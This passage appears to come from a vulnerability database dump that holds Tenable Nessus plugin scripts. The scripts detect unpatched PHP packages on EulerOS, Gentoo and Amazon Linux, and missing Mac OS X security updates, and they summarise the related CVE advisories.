crafted input\n processed by the unserialize() function could cause a\n PHP application to crash.(CVE-2014-3669)\n\n - It was found that PHP move_uploaded_file() function did\n not properly handle file names with a NULL character. 
A\n remote attacker could possibly use this flaw to make a\n PHP script access unexpected files and bypass intended\n file system access restrictions.(CVE-2015-2348)\n\n - An integer overflow flaw leading to a heap-based buffer\n overflow was found in the way PHP's FTP extension\n parsed file listing FTP server responses. A malicious\n FTP server could use this flaw to cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-4022)\n\n - A flaw was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-6836)\n\n - A NULL pointer dereference flaw was found in the\n XSLTProcessor class in PHP. An attacker could use this\n flaw to cause a PHP application to crash if it\n performed Extensible Stylesheet Language (XSL)\n transformations using untrusted XSLT files and allowed\n the use of PHP functions to be used as XSLT functions\n within XSL stylesheets.(CVE-2015-6837)\n\n - It was found that PHP's gd extension did not properly\n handle file names with a null character. A remote\n attacker could possibly use this flaw to make a PHP\n application access unexpected files and bypass intended\n file system access restrictions.(CVE-2014-5120)\n\n - A flaw was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-6835)\n\n - Stack consumption vulnerability in\n Zend/zend_exceptions.c in PHP before 5.4.44, 5.5.x\n before 5.5.28, and 5.6.x before 5.6.12 allows remote\n attackers to cause a denial of service (segmentation\n fault) via recursive method calls.(CVE-2015-8873)\n\n - An uninitialized pointer use flaw was found in PHP's\n Exif extension. 
A specially crafted JPEG or TIFF file\n could cause a PHP application using the\n exif_read_data() function to crash or, possibly,\n execute arbitrary code with the privileges of the user\n running that PHP application.(CVE-2015-0232)\n\n - A flaws was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-2787)\n\n - A buffer over-read flaw was found in PHP's phar (PHP\n Archive) paths implementation. A malicious script\n author could possibly use this flaw to disclose certain\n portions of server memory.(CVE-2015-2783)\n\n - A use-after-free flaw was found in the unserialize()\n function of PHP's DateTimeZone implementation. A\n malicious script author could possibly use this flaw to\n disclose certain portions of server\n memory.(CVE-2015-0273)\n\n - Multiple buffer over-read flaws were found in the\n php_parserr() function of PHP. A malicious DNS server\n or a man-in-the-middle attacker could possibly use this\n flaw to crash a PHP application that used the\n dns_get_record() function to perform a DNS\n query.(CVE-2014-3597)\n\n - A buffer overflow flaw was found in the way PHP's Phar\n extension parsed Phar archives. A specially crafted\n archive could cause PHP to crash or, possibly, execute\n arbitrary code when opened.(CVE-2015-3329)\n\n - Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP before 5.4.42, 5.5.x before\n 5.5.26, and 5.6.x before 5.6.10 allows remote FTP\n servers to execute arbitrary code via a long reply to a\n LIST command, leading to a heap-based buffer overflow.\n NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2015-4022.(CVE-2015-4643)\n\n - A type confusion issue was found in PHP's phpinfo()\n function. 
A malicious script author could possibly use\n this flaw to disclose certain portions of server\n memory.(CVE-2014-4721)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1543\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a562103a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6836\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"php-5.4.16-45.h9\",\n \"php-cli-5.4.16-45.h9\",\n \"php-common-5.4.16-45.h9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-09T01:32:37", "description": "The remote host is affected by the vulnerability described in GLSA-201606-10 (PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in PHP. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n An attacker can possibly execute arbitrary code or create a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-20T00:00:00", "type": "nessus", "title": "GLSA-201606-10 : PHP: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-6501", "CVE-2014-9705", "CVE-2014-9709", "CVE-2015-0231", "CVE-2015-0273", "CVE-2015-1351", "CVE-2015-1352", "CVE-2015-2301", "CVE-2015-2348", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-4148", "CVE-2015-4642", "CVE-2015-4643", "CVE-2015-4644", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:php", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201606-10.NASL", "href": "https://www.tenable.com/plugins/nessus/91704", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201606-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91704);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-6501\", \"CVE-2014-9705\", \"CVE-2014-9709\", \"CVE-2015-0231\", \"CVE-2015-0273\", \"CVE-2015-1351\", \"CVE-2015-1352\", \"CVE-2015-2301\", \"CVE-2015-2348\", \"CVE-2015-2783\", \"CVE-2015-2787\", \"CVE-2015-3329\", \"CVE-2015-3330\", \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4025\", \"CVE-2015-4026\", \"CVE-2015-4147\", \"CVE-2015-4148\", \"CVE-2015-4642\", \"CVE-2015-4643\", \"CVE-2015-4644\", \"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-7803\", \"CVE-2015-7804\");\n script_xref(name:\"GLSA\", value:\"201606-10\");\n\n script_name(english:\"GLSA-201606-10 : PHP: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201606-10\n(PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in PHP. 
Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n An attacker can possibly execute arbitrary code or create a Denial of\n Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201606-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PHP 5.4 users should upgrade to the latest 5.5 stable branch, as PHP\n 5.4 is now masked in Portage:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-5.5.33'\n All PHP 5.5 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-5.5.33'\n All PHP 5.6 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-5.6.19'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-lang/php\", unaffected:make_list(\"ge 5.6.19\", \"rge 5.5.33\", \"rge 5.5.34\", \"rge 5.5.35\", \"rge 5.5.36\", \"rge 5.5.37\", \"rge 5.5.38\"), vulnerable:make_list(\"lt 5.6.19\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PHP\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:32:24", "description": "The remote host is running a version of Mac OS X 10.9.5 or 10.10.5 that is missing Security Update 2015-004 or 2015-007. 
It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Accelerate Framework\n - apache_mod_php\n - ATS\n - Audio\n - CFNetwork\n - CoreGraphics\n - CoreText\n - EFI\n - FontParser\n - Grand Central Dispatch\n - ImageIO\n - IOAcceleratorFamily\n - Kernel\n - libarchive\n - MCX Application Restrictions\n - OpenGL\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-10T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Updates 2015-004 / 2015-007)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273", "CVE-2015-4860", "CVE-2015-5924", "CVE-2015-5925", "CVE-2015-5926", "CVE-2015-5927", "CVE-2015-5932", "CVE-2015-5933", "CVE-2015-5934", "CVE-2015-5935", "CVE-2015-5936", "CVE-2015-5937", "CVE-2015-5938", "CVE-2015-5939", "CVE-2015-5940", "CVE-2015-5942", "CVE-2015-5944", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-6975", "CVE-2015-6976", "CVE-2015-6977", "CVE-2015-6978", "CVE-2015-6984", "CVE-2015-6985", "CVE-2015-6989", "CVE-2015-6991", "CVE-2015-6992", "CVE-2015-6993", "CVE-2015-6996", "CVE-2015-7009", "CVE-2015-7010", "CVE-2015-7016", "CVE-2015-7018", "CVE-2015-7023", "CVE-2015-7035"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2015-007.NASL", "href": "https://www.tenable.com/plugins/nessus/86829", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86829);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-4860\",\n \"CVE-2015-5924\",\n \"CVE-2015-5925\",\n \"CVE-2015-5926\",\n \"CVE-2015-5927\",\n \"CVE-2015-5932\",\n \"CVE-2015-5933\",\n 
\"CVE-2015-5934\",\n \"CVE-2015-5935\",\n \"CVE-2015-5936\",\n \"CVE-2015-5937\",\n \"CVE-2015-5938\",\n \"CVE-2015-5939\",\n \"CVE-2015-5940\",\n \"CVE-2015-5942\",\n \"CVE-2015-5944\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\",\n \"CVE-2015-6975\",\n \"CVE-2015-6976\",\n \"CVE-2015-6977\",\n \"CVE-2015-6978\",\n \"CVE-2015-6984\",\n \"CVE-2015-6985\",\n \"CVE-2015-6989\",\n \"CVE-2015-6991\",\n \"CVE-2015-6992\",\n \"CVE-2015-6993\",\n \"CVE-2015-6996\",\n \"CVE-2015-7009\",\n \"CVE-2015-7010\",\n \"CVE-2015-7016\",\n \"CVE-2015-7018\",\n \"CVE-2015-7023\",\n \"CVE-2015-7035\"\n );\n script_bugtraq_id(\n 69477,\n 72325,\n 72701,\n 74971,\n 76317,\n 76644,\n 76649,\n 76733,\n 76734,\n 76738,\n 77162,\n 77263,\n 77265,\n 77266,\n 77270\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-10-21-4\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Updates 2015-004 / 2015-007)\");\n script_summary(english:\"Checks for the presence of Security Update 2015-004 and 2015-007.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.9.5 or 10.10.5\nthat is missing Security Update 2015-004 or 2015-007. 
It is,\ntherefore, affected by multiple vulnerabilities in the following\ncomponents :\n\n - Accelerate Framework\n - apache_mod_php\n - ATS\n - Audio\n - CFNetwork\n - CoreGraphics\n - CoreText\n - EFI\n - FontParser\n - Grand Central Dispatch\n - ImageIO\n - IOAcceleratorFamily\n - Kernel\n - libarchive\n - MCX Application Restrictions\n - OpenGL\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT205375\");\n # https://lists.apple.com/archives/security-announce/2015/Oct/msg00005.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7e01da3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2015-004 / 2015-007 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\n# Advisory states that update 2015-004 is available for 10.10.5 and update 2015-007 is available for 10.9.5\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.(9|10)\\.5([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9.5 or Mac OS X 10.10.5\");\n\nif (\"10.9.5\" >< os) patch = \"2015-007\";\nelse if (\"10.10.5\" >< os) patch = \"2015-004\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\..*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || 
empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-11T18:35:58", "description": "The SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data. (CVE-2016-7480)\n\nUse-after-free vulnerability in the CURLFile implementation in ext/curl/curl_file.c in PHP 7.x before 7.0.12 allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that is mishandled during __wakeup processing. (CVE-2016-9137)\n\nStack consumption vulnerability in the gdImageFillToBorder function in gd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in PHP 7.x before 7.0.13, allows remote attackers to cause a denial of service (segmentation violation) via a crafted imagefilltoborder call that triggers use of a negative color value. (CVE-2016-9933)\n\next/wddx/wddx.c in PHP 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string. 
(CVE-2016-9934)\n\nThe php_wddx_push_element function in ext/wddx/wddx.c in PHP 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document. (CVE-2016-9935)\n\nThe unserialize implementation in ext/standard/var.c in PHP 7.x before 7.0.14 allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted serialized data. This vulnerability exists because of an incomplete fix for CVE-2015-6834 . (CVE-2016-9936)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-27T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php70 (ALAS-2017-788)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2016-7480", "CVE-2016-9137", "CVE-2016-9933", "CVE-2016-9934", "CVE-2016-9935", "CVE-2016-9936"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php70", "p-cpe:/a:amazon:linux:php70-bcmath", "p-cpe:/a:amazon:linux:php70-cli", "p-cpe:/a:amazon:linux:php70-common", "p-cpe:/a:amazon:linux:php70-dba", "p-cpe:/a:amazon:linux:php70-dbg", "p-cpe:/a:amazon:linux:php70-debuginfo", "p-cpe:/a:amazon:linux:php70-devel", "p-cpe:/a:amazon:linux:php70-embedded", "p-cpe:/a:amazon:linux:php70-enchant", "p-cpe:/a:amazon:linux:php70-fpm", "p-cpe:/a:amazon:linux:php70-gd", "p-cpe:/a:amazon:linux:php70-gmp", "p-cpe:/a:amazon:linux:php70-imap", "p-cpe:/a:amazon:linux:php70-intl", "p-cpe:/a:amazon:linux:php70-json", "p-cpe:/a:amazon:linux:php70-ldap", "p-cpe:/a:amazon:linux:php70-mbstring", "p-cpe:/a:amazon:linux:php70-mcrypt", "p-cpe:/a:amazon:linux:php70-mysqlnd", "p-cpe:/a:amazon:linux:php70-odbc", "p-cpe:/a:amazon:linux:php70-opcache", "p-cpe:/a:amazon:linux:php70-pdo", "p-cpe:/a:amazon:linux:php70-pdo-dblib", "p-cpe:/a:amazon:linux:php70-pgsql", "p-cpe:/a:amazon:linux:php70-process", 
"p-cpe:/a:amazon:linux:php70-pspell", "p-cpe:/a:amazon:linux:php70-recode", "p-cpe:/a:amazon:linux:php70-snmp", "p-cpe:/a:amazon:linux:php70-soap", "p-cpe:/a:amazon:linux:php70-tidy", "p-cpe:/a:amazon:linux:php70-xml", "p-cpe:/a:amazon:linux:php70-xmlrpc", "p-cpe:/a:amazon:linux:php70-zip", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-788.NASL", "href": "https://www.tenable.com/plugins/nessus/96806", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-788.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96806);\n script_version(\"3.2\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-7480\", \"CVE-2016-9137\", \"CVE-2016-9933\", \"CVE-2016-9934\", \"CVE-2016-9935\", \"CVE-2016-9936\");\n script_xref(name:\"ALAS\", value:\"2017-788\");\n\n script_name(english:\"Amazon Linux AMI : php70 (ALAS-2017-788)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SplObjectStorage unserialize implementation in\next/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key\nis an object, which allows remote attackers to execute arbitrary code\nor cause a denial of service (uninitialized memory access) via crafted\nserialized data. (CVE-2016-7480)\n\nUse-after-free vulnerability in the CURLFile implementation in\next/curl/curl_file.c in PHP 7.x before 7.0.12 allows remote attackers\nto cause a denial of service or possibly have unspecified other impact\nvia crafted serialized data that is mishandled during __wakeup\nprocessing. 
(CVE-2016-9137)\n\nStack consumption vulnerability in the gdImageFillToBorder function in\ngd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in\nPHP 7.x before 7.0.13, allows remote attackers to cause a denial of\nservice (segmentation violation) via a crafted imagefilltoborder call\nthat triggers use of a negative color value. (CVE-2016-9933)\n\next/wddx/wddx.c in PHP 7.x before 7.0.13 allows remote attackers to\ncause a denial of service (NULL pointer dereference) via crafted\nserialized data in a wddxPacket XML document, as demonstrated by a\nPDORow string. (CVE-2016-9934)\n\nThe php_wddx_push_element function in ext/wddx/wddx.c in PHP 7.x\nbefore 7.0.14 allows remote attackers to cause a denial of service\n(out-of-bounds read and memory corruption) or possibly have\nunspecified other impact via an empty boolean element in a wddxPacket\nXML document. (CVE-2016-9935)\n\nThe unserialize implementation in ext/standard/var.c in PHP 7.x before\n7.0.14 allows remote attackers to cause a denial of service\n(use-after-free) or possibly have unspecified other impact via crafted\nserialized data. This vulnerability exists because of an incomplete\nfix for CVE-2015-6834 . 
